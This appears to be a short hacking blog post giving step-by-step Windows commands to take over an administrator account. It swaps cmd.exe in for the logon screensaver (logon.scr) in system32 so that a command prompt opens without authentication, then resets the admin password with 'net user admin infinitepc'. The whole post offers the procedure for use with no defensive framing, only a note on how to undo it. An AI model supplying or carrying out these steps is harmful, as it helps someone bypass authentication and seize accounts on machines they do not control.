How to hack administrator password [New]

I have already shown how to hack admin password in the basic way.If that doesn't work , you can try this new and advance method to hack administrator password.

>>Go to Start>Run , type cmd to open  command prompt
>>Enter this command cd\ to make directory to C:(default drive)

>>Now enter this command cd windows\system32  , to change the directory in command prompt to C:\windows\system32
>>Now type mkdir temphack to make a temporary directory for backup

Admin Hack

Admin Hack

>>Then , type copy logon.scr temphack\logon.scr  to copy logon.scr to temphack folder
>>Now type  copy cmd.exe temphack\cmd.exe copy cmd.exe to temphack folder
>>Then type del logon.scr to delete logon.scr . The backup of this file is in the folder temphack
>>Now type rename cmd.exe logon.scr to rename command prompt to logon screensaver

>>Now you get unprotected command prompt without logging in when windows loads logon screensaver at startup

>>When command prompt appears enter this command
net user admin infinitepc

>>Now you have hacked admin account and his/her password is set to infinitepc

>>After you have hacked admin you can restart and login with hacked administrator password


*Dont forget the spaces involved in all the above commands
*To restore this hack just go to temphack folder found in windows\system32 directory and copy those two files in that folder and paste those files in system32 folder(overwrite those files in this folder)
*The above hack works mostly  on FAT/FAT 32 systems not on NTFS systems
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